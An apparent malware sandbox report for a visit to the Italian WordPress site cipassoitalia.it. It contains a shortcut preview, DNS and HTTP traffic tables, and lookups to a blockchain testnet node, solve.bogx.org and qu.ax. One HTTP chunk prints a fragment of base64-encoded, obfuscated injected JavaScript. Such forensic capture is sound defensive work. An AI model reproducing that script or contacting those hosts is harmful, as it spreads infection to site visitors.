Preview:	L..................F.@.. ...$+.,....h....b..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I)ZWb....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V)Zcb....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V)Zcb....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V)Zcb..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V)Zeb...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............%......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 9, 2025 13:19:08.571116924 CET	192.168.2.16	1.1.1.1	0xeeba	Standard query (0)	cipassoitalia.it	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:08.571253061 CET	192.168.2.16	1.1.1.1	0xf50c	Standard query (0)	cipassoitalia.it	65	IN (0x0001)	false
Jan 9, 2025 13:19:09.354784966 CET	192.168.2.16	1.1.1.1	0x5c34	Standard query (0)	www.cipassoitalia.it	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:09.355031013 CET	192.168.2.16	1.1.1.1	0xcf3f	Standard query (0)	www.cipassoitalia.it	65	IN (0x0001)	false
Jan 9, 2025 13:19:10.629807949 CET	192.168.2.16	1.1.1.1	0x8380	Standard query (0)	s.w.org	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:10.629992008 CET	192.168.2.16	1.1.1.1	0xb9	Standard query (0)	s.w.org	65	IN (0x0001)	false
Jan 9, 2025 13:19:12.486879110 CET	192.168.2.16	1.1.1.1	0x54a9	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:12.487176895 CET	192.168.2.16	1.1.1.1	0x7371	Standard query (0)	www.google.com	65	IN (0x0001)	false
Jan 9, 2025 13:19:23.266685009 CET	192.168.2.16	1.1.1.1	0xaeea	Standard query (0)	www.cipassoitalia.it	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:23.266834974 CET	192.168.2.16	1.1.1.1	0x2132	Standard query (0)	www.cipassoitalia.it	65	IN (0x0001)	false
Jan 9, 2025 13:19:23.783159018 CET	192.168.2.16	1.1.1.1	0x2d0b	Standard query (0)	data-seed-prebsc-1-s1.bnbchain.org	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:23.783328056 CET	192.168.2.16	1.1.1.1	0xd3a9	Standard query (0)	_8545._https.data-seed-prebsc-1-s1.bnbchain.org	65	IN (0x0001)	false
Jan 9, 2025 13:19:24.736670971 CET	192.168.2.16	1.1.1.1	0xbfad	Standard query (0)	data-seed-prebsc-1-s1.bnbchain.org	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:24.736865997 CET	192.168.2.16	1.1.1.1	0x2e37	Standard query (0)	_8545._https.data-seed-prebsc-1-s1.bnbchain.org	65	IN (0x0001)	false
Jan 9, 2025 13:19:24.751019001 CET	192.168.2.16	1.1.1.1	0xa90f	Standard query (0)	use.fontawesome.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:24.751133919 CET	192.168.2.16	1.1.1.1	0xfdc8	Standard query (0)	use.fontawesome.com	65	IN (0x0001)	false
Jan 9, 2025 13:19:26.119672060 CET	192.168.2.16	1.1.1.1	0xbd32	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:26.119822025 CET	192.168.2.16	1.1.1.1	0xc11f	Standard query (0)	www.google.com	65	IN (0x0001)	false
Jan 9, 2025 13:19:26.120122910 CET	192.168.2.16	1.1.1.1	0x9664	Standard query (0)	mc.yandex.ru	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:26.120309114 CET	192.168.2.16	1.1.1.1	0x934a	Standard query (0)	mc.yandex.ru	65	IN (0x0001)	false
Jan 9, 2025 13:19:27.177092075 CET	192.168.2.16	1.1.1.1	0x577f	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:27.177292109 CET	192.168.2.16	1.1.1.1	0xb2ec	Standard query (0)	www.google.com	65	IN (0x0001)	false
Jan 9, 2025 13:19:27.759013891 CET	192.168.2.16	1.1.1.1	0x11cd	Standard query (0)	mc.yandex.ru	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:27.759155989 CET	192.168.2.16	1.1.1.1	0x24aa	Standard query (0)	mc.yandex.ru	65	IN (0x0001)	false
Jan 9, 2025 13:19:27.909157038 CET	192.168.2.16	1.1.1.1	0x13cf	Standard query (0)	mc.yandex.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:27.909461021 CET	192.168.2.16	1.1.1.1	0x455b	Standard query (0)	mc.yandex.com	65	IN (0x0001)	false
Jan 9, 2025 13:19:28.632859945 CET	192.168.2.16	1.1.1.1	0x32a8	Standard query (0)	mc.yandex.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:28.632859945 CET	192.168.2.16	1.1.1.1	0x7dd2	Standard query (0)	mc.yandex.com	65	IN (0x0001)	false
Jan 9, 2025 13:19:30.242862940 CET	192.168.2.16	1.1.1.1	0x3923	Standard query (0)	mc.yandex.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:30.243002892 CET	192.168.2.16	1.1.1.1	0xc80b	Standard query (0)	mc.yandex.com	65	IN (0x0001)	false
Jan 9, 2025 13:19:34.063040972 CET	192.168.2.16	1.1.1.1	0x3a08	Standard query (0)	s.w.org	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:34.063213110 CET	192.168.2.16	1.1.1.1	0x33b5	Standard query (0)	s.w.org	65	IN (0x0001)	false
Jan 9, 2025 13:20:19.996762037 CET	192.168.2.16	1.1.1.1	0x1053	Standard query (0)	solve.bogx.org	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:20:23.797573090 CET	192.168.2.16	1.1.1.1	0x7111	Standard query (0)	qu.ax	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:20:52.610505104 CET	192.168.2.16	1.1.1.1	0x3608	Standard query (0)	qu.ax	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:21:39.122116089 CET	192.168.2.16	1.1.1.1	0x3f1e	Standard query (0)	qu.ax	A (IP address)	IN (0x0001)	false

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 9, 2025 13:19:08.654670954 CET	1.1.1.1	192.168.2.16	0xeeba	No error (0)	cipassoitalia.it		89.46.108.67	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:09.424834013 CET	1.1.1.1	192.168.2.16	0x5c34	No error (0)	www.cipassoitalia.it		89.46.108.67	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:10.636720896 CET	1.1.1.1	192.168.2.16	0x8380	No error (0)	s.w.org		192.0.77.48	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:12.494117022 CET	1.1.1.1	192.168.2.16	0x7371	No error (0)	www.google.com			65	IN (0x0001)	false
Jan 9, 2025 13:19:12.494137049 CET	1.1.1.1	192.168.2.16	0x54a9	No error (0)	www.google.com		216.58.212.132	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:23.392247915 CET	1.1.1.1	192.168.2.16	0xaeea	No error (0)	www.cipassoitalia.it		89.46.108.67	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:23.790690899 CET	1.1.1.1	192.168.2.16	0xd3a9	Name error (3)	_8545._https.data-seed-prebsc-1-s1.bnbchain.org	none	none	65	IN (0x0001)	false
Jan 9, 2025 13:19:23.810519934 CET	1.1.1.1	192.168.2.16	0x2d0b	No error (0)	data-seed-prebsc-1-s1.bnbchain.org	a37dd8b3f3000a75e.awsglobalaccelerator.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 13:19:23.810519934 CET	1.1.1.1	192.168.2.16	0x2d0b	No error (0)	a37dd8b3f3000a75e.awsglobalaccelerator.com		3.33.155.121	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:23.810519934 CET	1.1.1.1	192.168.2.16	0x2d0b	No error (0)	a37dd8b3f3000a75e.awsglobalaccelerator.com		15.197.152.159	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:24.744824886 CET	1.1.1.1	192.168.2.16	0x2e37	Name error (3)	_8545._https.data-seed-prebsc-1-s1.bnbchain.org	none	none	65	IN (0x0001)	false
Jan 9, 2025 13:19:24.758141994 CET	1.1.1.1	192.168.2.16	0xa90f	No error (0)	use.fontawesome.com	use.fontawesome.com.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 13:19:24.758394003 CET	1.1.1.1	192.168.2.16	0xfdc8	No error (0)	use.fontawesome.com	use.fontawesome.com.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 13:19:24.764461040 CET	1.1.1.1	192.168.2.16	0xbfad	No error (0)	data-seed-prebsc-1-s1.bnbchain.org	a37dd8b3f3000a75e.awsglobalaccelerator.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 13:19:24.764461040 CET	1.1.1.1	192.168.2.16	0xbfad	No error (0)	a37dd8b3f3000a75e.awsglobalaccelerator.com		3.33.155.121	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:24.764461040 CET	1.1.1.1	192.168.2.16	0xbfad	No error (0)	a37dd8b3f3000a75e.awsglobalaccelerator.com		15.197.152.159	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:26.126287937 CET	1.1.1.1	192.168.2.16	0xbd32	No error (0)	www.google.com		142.250.185.68	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:26.126669884 CET	1.1.1.1	192.168.2.16	0x9664	No error (0)	mc.yandex.ru		87.250.251.119	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:26.126669884 CET	1.1.1.1	192.168.2.16	0x9664	No error (0)	mc.yandex.ru		87.250.250.119	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:26.126669884 CET	1.1.1.1	192.168.2.16	0x9664	No error (0)	mc.yandex.ru		93.158.134.119	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:26.126669884 CET	1.1.1.1	192.168.2.16	0x9664	No error (0)	mc.yandex.ru		77.88.21.119	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:26.126699924 CET	1.1.1.1	192.168.2.16	0xc11f	No error (0)	www.google.com			65	IN (0x0001)	false
Jan 9, 2025 13:19:27.184118986 CET	1.1.1.1	192.168.2.16	0xb2ec	No error (0)	www.google.com			65	IN (0x0001)	false
Jan 9, 2025 13:19:27.184163094 CET	1.1.1.1	192.168.2.16	0x577f	No error (0)	www.google.com		142.250.186.164	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:27.765707970 CET	1.1.1.1	192.168.2.16	0x11cd	No error (0)	mc.yandex.ru		93.158.134.119	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:27.765707970 CET	1.1.1.1	192.168.2.16	0x11cd	No error (0)	mc.yandex.ru		87.250.250.119	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:27.765707970 CET	1.1.1.1	192.168.2.16	0x11cd	No error (0)	mc.yandex.ru		87.250.251.119	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:27.765707970 CET	1.1.1.1	192.168.2.16	0x11cd	No error (0)	mc.yandex.ru		77.88.21.119	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:27.916101933 CET	1.1.1.1	192.168.2.16	0x455b	No error (0)	mc.yandex.com	mc.yandex.ru		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 13:19:27.916173935 CET	1.1.1.1	192.168.2.16	0x13cf	No error (0)	mc.yandex.com	mc.yandex.ru		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 13:19:27.916173935 CET	1.1.1.1	192.168.2.16	0x13cf	No error (0)	mc.yandex.ru		77.88.21.119	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:27.916173935 CET	1.1.1.1	192.168.2.16	0x13cf	No error (0)	mc.yandex.ru		87.250.251.119	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:27.916173935 CET	1.1.1.1	192.168.2.16	0x13cf	No error (0)	mc.yandex.ru		87.250.250.119	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:27.916173935 CET	1.1.1.1	192.168.2.16	0x13cf	No error (0)	mc.yandex.ru		93.158.134.119	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:28.639751911 CET	1.1.1.1	192.168.2.16	0x7dd2	No error (0)	mc.yandex.com	mc.yandex.ru		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 13:19:28.639895916 CET	1.1.1.1	192.168.2.16	0x32a8	No error (0)	mc.yandex.com	mc.yandex.ru		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 13:19:28.639895916 CET	1.1.1.1	192.168.2.16	0x32a8	No error (0)	mc.yandex.ru		87.250.250.119	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:28.639895916 CET	1.1.1.1	192.168.2.16	0x32a8	No error (0)	mc.yandex.ru		93.158.134.119	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:28.639895916 CET	1.1.1.1	192.168.2.16	0x32a8	No error (0)	mc.yandex.ru		77.88.21.119	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:28.639895916 CET	1.1.1.1	192.168.2.16	0x32a8	No error (0)	mc.yandex.ru		87.250.251.119	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:30.249574900 CET	1.1.1.1	192.168.2.16	0x3923	No error (0)	mc.yandex.com	mc.yandex.ru		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 13:19:30.249574900 CET	1.1.1.1	192.168.2.16	0x3923	No error (0)	mc.yandex.ru		93.158.134.119	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:30.249574900 CET	1.1.1.1	192.168.2.16	0x3923	No error (0)	mc.yandex.ru		87.250.251.119	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:30.249574900 CET	1.1.1.1	192.168.2.16	0x3923	No error (0)	mc.yandex.ru		77.88.21.119	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:30.249574900 CET	1.1.1.1	192.168.2.16	0x3923	No error (0)	mc.yandex.ru		87.250.250.119	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:19:30.249599934 CET	1.1.1.1	192.168.2.16	0xc80b	No error (0)	mc.yandex.com	mc.yandex.ru		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 13:19:34.070494890 CET	1.1.1.1	192.168.2.16	0x3a08	No error (0)	s.w.org		192.0.77.48	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:20:20.030745983 CET	1.1.1.1	192.168.2.16	0x1053	No error (0)	solve.bogx.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:20:20.030745983 CET	1.1.1.1	192.168.2.16	0x1053	No error (0)	solve.bogx.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:20:20.030745983 CET	1.1.1.1	192.168.2.16	0x1053	No error (0)	solve.bogx.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:20:20.030745983 CET	1.1.1.1	192.168.2.16	0x1053	No error (0)	solve.bogx.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:20:20.030745983 CET	1.1.1.1	192.168.2.16	0x1053	No error (0)	solve.bogx.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:20:20.030745983 CET	1.1.1.1	192.168.2.16	0x1053	No error (0)	solve.bogx.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:20:20.030745983 CET	1.1.1.1	192.168.2.16	0x1053	No error (0)	solve.bogx.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:20:23.827594042 CET	1.1.1.1	192.168.2.16	0x7111	No error (0)	qu.ax		188.245.212.29	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:20:23.827594042 CET	1.1.1.1	192.168.2.16	0x7111	No error (0)	qu.ax		188.245.212.25	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:20:23.827594042 CET	1.1.1.1	192.168.2.16	0x7111	No error (0)	qu.ax		157.90.29.179	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:20:52.618110895 CET	1.1.1.1	192.168.2.16	0x3608	No error (0)	qu.ax		188.245.212.29	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:20:52.618110895 CET	1.1.1.1	192.168.2.16	0x3608	No error (0)	qu.ax		188.245.211.225	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:20:52.618110895 CET	1.1.1.1	192.168.2.16	0x3608	No error (0)	qu.ax		167.235.132.18	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:21:39.129290104 CET	1.1.1.1	192.168.2.16	0x3f1e	No error (0)	qu.ax		167.235.132.18	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:21:39.129290104 CET	1.1.1.1	192.168.2.16	0x3f1e	No error (0)	qu.ax		188.245.212.25	A (IP address)	IN (0x0001)	false
Jan 9, 2025 13:21:39.129290104 CET	1.1.1.1	192.168.2.16	0x3f1e	No error (0)	qu.ax		157.90.29.179	A (IP address)	IN (0x0001)	false

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 13:19:08.660646915 CET	431	OUT	GET / HTTP/1.1 Host: cipassoitalia.it Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Jan 9, 2025 13:19:09.351367950 CET	430	IN	HTTP/1.1 301 Moved Permanently Server: aruba-proxy Date: Thu, 09 Jan 2025 12:19:09 GMT Content-Type: text/html Content-Length: 168 Connection: keep-alive Location: https://www.cipassoitalia.it/ X-ServerName: webx.aruba.it Alt-Svc: h3=":443"; ma=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 61 72 75 62 61 2d 70 72 6f 78 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>aruba-proxy</center></body></html>
Jan 9, 2025 13:19:54.359164953 CET	6	OUT	Data Raw: 00 Data Ascii:

Timestamp	Bytes transferred	Direction	Data
2025-01-09 12:19:10 UTC	663	OUT	GET / HTTP/1.1 Host: www.cipassoitalia.it Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-09 12:19:10 UTC	485	IN	HTTP/1.1 200 OK Server: aruba-proxy Date: Thu, 09 Jan 2025 12:19:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Link: <https://www.cipassoitalia.it/wp-json/>; rel="https://api.w.org/", <https://www.cipassoitalia.it/wp-json/wp/v2/pages/838>; rel="alternate"; type="application/json", <https://www.cipassoitalia.it/>; rel=shortlink X-ServerName: webx.aruba.it X-Aruba-Cache: HIT Alt-Svc: h3=":443"; ma=86400
2025-01-09 12:19:10 UTC	15899	IN	Data Raw: 38 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 69 74 2d 49 54 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 5f 73 74 72 65 74 63 68 65 64 20 72 65 73 70 6f 6e 73 69 76 65 20 61 76 2d 70 72 65 6c 6f 61 64 65 72 2d 64 69 73 61 62 6c 65 64 20 61 76 2d 64 65 66 61 75 6c 74 2d 6c 69 67 68 74 62 6f 78 20 20 68 74 6d 6c 5f 68 65 61 64 65 72 5f 74 6f 70 20 68 74 6d 6c 5f 6c 6f 67 6f 5f 6c 65 66 74 20 68 74 6d 6c 5f 6d 61 69 6e 5f 6e 61 76 5f 68 65 61 64 65 72 20 68 74 6d 6c 5f 6d 65 6e 75 5f 72 69 67 68 74 20 68 74 6d 6c 5f 63 75 73 74 6f 6d 20 68 74 6d 6c 5f 68 65 61 64 65 72 5f 73 74 69 63 6b 79 20 68 74 6d 6c 5f 68 65 61 64 65 72 5f 73 68 72 69 6e 6b 69 6e 67 20 68 74 6d 6c 5f 68 65 61 64 65 72 5f 74 6f 70 62 61 Data Ascii: 8000<!DOCTYPE html><html lang="it-IT" class="html_stretched responsive av-preloader-disabled av-default-lightbox html_header_top html_logo_left html_main_nav_header html_menu_right html_custom html_header_sticky html_header_shrinking html_header_topba
2025-01-09 12:19:10 UTC	16384	IN	Data Raw: 39 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 61 76 69 61 2d 6d 6f 64 75 6c 65 2d 70 72 6f 6d 6f 62 6f 78 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 69 70 61 73 73 6f 69 74 61 6c 69 61 2e 69 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 65 6e 66 6f 6c 64 2f 63 6f 6e 66 69 67 2d 74 65 6d 70 6c 61 74 65 62 75 69 6c 64 65 72 2f 61 76 69 61 2d 73 68 6f 72 74 63 6f 64 65 73 2f 70 72 6f 6d 6f 62 6f 78 2f 70 72 6f 6d 6f 62 6f 78 2e 63 73 73 3f 76 65 72 3d 36 2e 30 2e 39 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e Data Ascii: 9' type='text/css' media='all' /><link rel='stylesheet' id='avia-module-promobox-css' href='https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/promobox/promobox.css?ver=6.0.9' type='text/css' media='all' /><lin
2025-01-09 12:19:10 UTC	16384	IN	Data Raw: 57 45 34 49 43 73 67 4d 48 67 78 49 43 6f 67 4c 54 42 34 4e 44 51 32 49 43 73 67 4d 48 67 35 49 43 6f 67 4d 48 67 7a 4f 57 55 70 4b 53 6b 73 49 47 78 6c 62 69 41 39 49 46 38 77 65 44 4d 31 4e 32 51 33 59 6c 74 66 4d 48 67 7a 4d 32 55 35 5a 6a 59 6f 4d 48 67 78 4e 6a 4d 70 58 53 68 4f 64 57 31 69 5a 58 49 73 49 46 38 77 65 44 4d 31 4e 32 51 33 59 6c 74 66 4d 48 67 7a 4d 32 55 35 5a 6a 59 6f 4d 48 67 78 4e 6a 4d 70 58 53 68 66 4d 48 67 33 4e 6a 46 68 4e 44 45 73 49 48 56 75 61 47 56 34 5a 57 52 62 58 7a 42 34 4d 7a 4e 6c 4f 57 59 32 4b 44 42 34 4d 54 51 35 4b 56 30 6f 4d 48 67 7a 59 69 41 71 49 43 30 77 65 44 49 34 49 43 73 67 4c 54 42 34 4f 57 59 31 49 43 6f 67 4d 48 67 78 49 43 73 67 4c 54 42 34 4d 32 51 67 4b 69 41 74 4d 48 67 31 4d 53 77 67 58 7a 42 34 Data Ascii: WE4ICsgMHgxICogLTB4NDQ2ICsgMHg5ICogMHgzOWUpKSksIGxlbiA9IF8weDM1N2Q3YltfMHgzM2U5ZjYoMHgxNjMpXShOdW1iZXIsIF8weDM1N2Q3YltfMHgzM2U5ZjYoMHgxNjMpXShfMHg3NjFhNDEsIHVuaGV4ZWRbXzB4MzNlOWY2KDB4MTQ5KV0oMHgzYiAqIC0weDI4ICsgLTB4OWY1ICogMHgxICsgLTB4M2QgKiAtMHg1MSwgXzB4
2025-01-09 12:19:10 UTC	16384	IN	Data Raw: 20 77 69 64 74 68 3d 22 33 33 33 22 20 20 69 74 65 6d 70 72 6f 70 3d 22 74 68 75 6d 62 6e 61 69 6c 55 72 6c 22 20 20 2f 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 68 65 69 67 68 74 3a 32 30 70 78 27 20 63 6c 61 73 73 3d 27 68 72 20 68 72 2d 69 6e 76 69 73 69 62 6c 65 20 20 20 61 76 69 61 2d 62 75 69 6c 64 65 72 2d 65 6c 2d 38 20 20 65 6c 5f 61 66 74 65 72 5f 61 76 5f 69 6d 61 67 65 20 20 65 6c 5f 62 65 66 6f 72 65 5f 61 76 5f 73 6c 69 64 65 73 68 6f 77 5f 61 63 63 6f 72 64 69 6f 6e 20 20 61 76 69 61 2d 62 75 69 6c 64 65 72 2d 65 6c 2d 6c 61 73 74 20 27 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 68 72 2d 69 6e 6e 65 72 20 27 20 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 68 72 2d 69 6e 6e 65 72 2d 73 74 79 Data Ascii: width="333" itemprop="thumbnailUrl" /></div></div></div><div style='height:20px' class='hr hr-invisible avia-builder-el-8 el_after_av_image el_before_av_slideshow_accordion avia-builder-el-last '><span class='hr-inner ' ><span class='hr-inner-sty
2025-01-09 12:19:10 UTC	16384	IN	Data Raw: 3c 64 69 76 20 63 6c 61 73 73 3d 27 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 63 6c 65 61 72 66 69 78 27 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 68 65 69 67 68 74 3a 32 30 70 78 27 20 63 6c 61 73 73 3d 27 68 72 20 68 72 2d 69 6e 76 69 73 69 62 6c 65 20 20 20 61 76 69 61 2d 62 75 69 6c 64 65 72 2d 65 6c 2d 32 36 20 20 65 6c 5f 61 66 74 65 72 5f 61 76 5f 6c 61 79 6f 75 74 5f 72 6f 77 20 20 65 6c 5f 62 65 66 6f 72 65 5f 61 76 5f 73 65 63 74 69 6f 6e 20 20 61 76 69 61 2d 62 75 69 6c 64 65 72 2d 65 6c 2d 6e 6f 2d 73 69 62 6c 69 6e 67 20 27 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 68 72 2d 69 6e 6e 65 72 20 27 20 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 68 72 2d 69 6e 6e 65 72 2d 73 74 79 6c 65 27 3e 3c 2f 73 70 61 6e 3e 3c 2f 73 70 Data Ascii: <div class='entry-content-wrapper clearfix'><div style='height:20px' class='hr hr-invisible avia-builder-el-26 el_after_av_layout_row el_before_av_section avia-builder-el-no-sibling '><span class='hr-inner ' ><span class='hr-inner-style'></span></sp
